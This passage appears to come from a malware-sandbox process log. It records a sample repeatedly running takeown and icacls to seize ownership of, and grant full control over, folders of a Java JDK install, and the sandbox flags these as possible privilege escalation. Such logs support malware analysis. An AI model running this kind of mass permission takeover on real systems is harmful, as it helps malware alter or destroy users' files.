C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF" /a2⤵PID:2696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF" /grant Administrators:F2⤵PID:2068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116" /a2⤵PID:780
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF" /a2⤵
- Modifies file permissions
PID:2812
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF" /grant Administrators:F2⤵PID:1956
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301" /a2⤵PID:2600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301" /grant Administrators:F2⤵PID:2388
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF" /a2⤵PID:1232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301" /a2⤵PID:1676
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301" /grant Administrators:F2⤵PID:1852
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF" /a2⤵PID:1724
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF" /grant Administrators:F2⤵PID:2492
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2" /a2⤵PID:1568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2" /grant Administrators:F2⤵PID:232
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core" /a2⤵PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core" /grant Administrators:F2⤵PID:1108
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache" /a2⤵PID:2412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache" /grant Administrators:F2⤵PID:2192
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary" /a2⤵PID:1876
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary" /grant Administrators:F2⤵PID:944
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine" /a2⤵PID:1152
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine" /grant Administrators:F2⤵PID:1632
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings" /a2⤵PID:2956
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings" /grant Administrators:F2⤵PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry" /a2⤵PID:2656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry" /grant Administrators:F2⤵PID:2540
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile" /a2⤵PID:2568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile" /grant Administrators:F2⤵PID:1684
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data" /a2⤵PID:2180
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data" /grant Administrators:F2⤵PID:2912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins" /a2⤵PID:2784
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins" /grant Administrators:F2⤵PID:1412
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303" /a2⤵
- Possible privilege escalation attempt
PID:896
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html" /a2⤵PID:2264
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon" /a2⤵PID:1204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon" /grant Administrators:F2⤵PID:2868
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css" /a2⤵PID:2888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css" /grant Administrators:F2⤵PID:1356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs" /a2⤵PID:2452
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs" /grant Administrators:F2⤵PID:484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html" /a2⤵PID:1028
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html" /grant Administrators:F2⤵PID:2724
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons" /a2⤵PID:208
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF" /a2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF" /grant Administrators:F2⤵PID:1168
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303" /a2⤵PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303" /grant Administrators:F2⤵PID:2124
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons" /a2⤵PID:1232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons" /grant Administrators:F2⤵PID:1740
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib" /a2⤵PID:1688
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib" /grant Administrators:F2⤵PID:1908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF" /a2⤵PID:2736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF" /grant Administrators:F2⤵PID:2652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema" /a2⤵
- Possible privilege escalation attempt
PID:2088
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema" /grant Administrators:F2⤵PID:1540
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033" /a2⤵PID:2832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033" /grant Administrators:F2⤵PID:2120
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF" /a2⤵PID:928
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF" /grant Administrators:F2⤵PID:2596
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717" /a2⤵PID:1876
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717" /grant Administrators:F2⤵PID:884
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css" /a2⤵PID:2364
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css" /grant Administrators:F2⤵PID:352
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark" /a2⤵PID:1592
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark" /grant Administrators:F2⤵PID:572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images" /a2⤵PID:2328
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images" /grant Administrators:F2⤵PID:1704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF" /a2⤵PID:2028
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF" /grant Administrators:F2⤵PID:2744
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm" /a2⤵PID:2548
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm" /grant Administrators:F2⤵PID:1516
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc" /a2⤵PID:2784
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc" /grant Administrators:F2⤵PID:2752
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform" /a2⤵PID:2036
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform" /grant Administrators:F2⤵PID:2436
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config" /a2⤵PID:200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config" /grant Administrators:F2⤵PID:1912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps" /a2⤵PID:696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps" /grant Administrators:F2⤵PID:1616
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules" /a2⤵PID:2932
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules" /grant Administrators:F2⤵PID:2480
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core" /a2⤵PID:1300
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core" /grant Administrators:F2⤵
- Modifies file permissions
PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale" /a2⤵PID:2724
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale" /grant Administrators:F2⤵PID:2348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib" /a2⤵PID:228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib" /grant Administrators:F2⤵PID:1636
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe" /a2⤵PID:788
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe" /grant Administrators:F2⤵PID:2024
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale" /a2⤵PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale" /grant Administrators:F2⤵PID:1016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules" /a2⤵PID:2116
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules" /grant Administrators:F2⤵PID:2844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext" /a2⤵PID:900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext" /grant Administrators:F2⤵PID:1540
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale" /a2⤵PID:1720
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale" /grant Administrators:F2⤵PID:2076
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale" /a2⤵PID:752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale" /grant Administrators:F2⤵PID:756
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking" /a2⤵PID:1980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking" /grant Administrators:F2⤵PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler" /a2⤵PID:1424
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler" /grant Administrators:F2⤵PID:928
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config" /a2⤵PID:2816
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config" /grant Administrators:F2⤵PID:2708
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules" /grant Administrators:F2⤵PID:2328
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib" /a2⤵PID:536
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib" /grant Administrators:F2⤵PID:1624
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed" /a2⤵PID:1288
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed" /grant Administrators:F2⤵PID:972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15" /a2⤵PID:1400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15" /grant Administrators:F2⤵PID:2264
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64" /a2⤵
- Modifies file permissions
PID:204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64" /grant Administrators:F2⤵PID:2784
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16" /a2⤵
- Modifies file permissions
PID:2336
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16" /grant Administrators:F2⤵PID:2400
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64" /a2⤵PID:2068
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64" /grant Administrators:F2⤵PID:696
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale" /a2⤵PID:2056
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2132
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules" /a2⤵PID:296
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale" /a2⤵PID:1260
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale" /grant Administrators:F2⤵PID:2388
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking" /a2⤵PID:1888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking" /grant Administrators:F2⤵PID:1300
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm" /a2⤵PID:1388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm" /grant Administrators:F2⤵PID:2980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config" /a2⤵PID:2376
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config" /grant Administrators:F2⤵PID:2764
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules" /a2⤵PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules" /grant Administrators:F2⤵PID:3068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core" /a2⤵PID:1656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core" /grant Administrators:F2⤵PID:3020
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale" /a2⤵PID:2516
-
-
